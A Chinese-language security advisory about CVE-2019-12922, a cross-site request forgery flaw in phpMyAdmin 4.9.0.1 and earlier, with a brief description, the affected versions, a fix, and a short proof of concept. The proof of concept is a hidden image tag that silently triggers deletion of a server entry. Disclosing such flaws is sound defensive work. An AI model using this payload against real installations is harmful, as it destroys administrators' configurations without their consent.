CVE-2019-12922：零日phpMyAdmin跨站点请求伪造漏洞警报

文章由LinuxBoy分享于2019-09-15 11:09:01热评（267）

CVE-2019-12922：零日phpMyAdmin跨站点请求伪造漏洞警报

phpMyAdmin是一个用PHP编写的免费软件工具，用于处理MySQL或MariaDB数据库服务器的管理。您可以使用phpMyAdmin执行大多数管理任务，包括创建数据库，运行查询和添加用户帐户。

已在phpMyAdmin中检测到跨站请求伪造，允许攻击者针对删除设置页面中任何服务器的phpMyAdmin用户触发CSRF攻击。攻击者可以轻松创建包含想要代表用户执行的请求的假超链接，这样就可以避免由于错误使用HTTP方法而导致的CSRF攻击。

CVE-2019-12922: phpMyAdmin 4.9.0.1 – 跨站请求伪造

受影响的版本

phpMyAdmin <= 4.9.0.1

Poc

Exploit CSRF – Deleting main server
<p>Deleting Server 1</p>
<img src=”
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1″
style=”display:none;” />

解决方法

在每次调用中实现令牌变量的验证，就像在其他phpMyAdmin请求中已经完成的那样。

Via: packetstormsecurity

linuxboy的RSS地址：https://www.linuxboy.net/rssFeed.aspx

本文永久更新链接地址：https://www.linuxboy.net/Linux/2019-09/160657.htm

推荐文章：

CVE-2019-12922：零日phpMyAdmin跨站点请求伪造漏洞警报

CVE-2019-12922：零日phpMyAdmin跨站点请求伪造漏洞警报

受影响的版本

Poc

解决方法

最新Linux安全教程

Linux头条

CVE-2019-12922：零日phpMyAdmin跨站点请求伪造漏洞警报

CVE-2019-12922：零日phpMyAdmin跨站点请求伪造漏洞警报

受影响的版本

Poc

解决方法

相关内容

最新Linux安全教程

Linux头条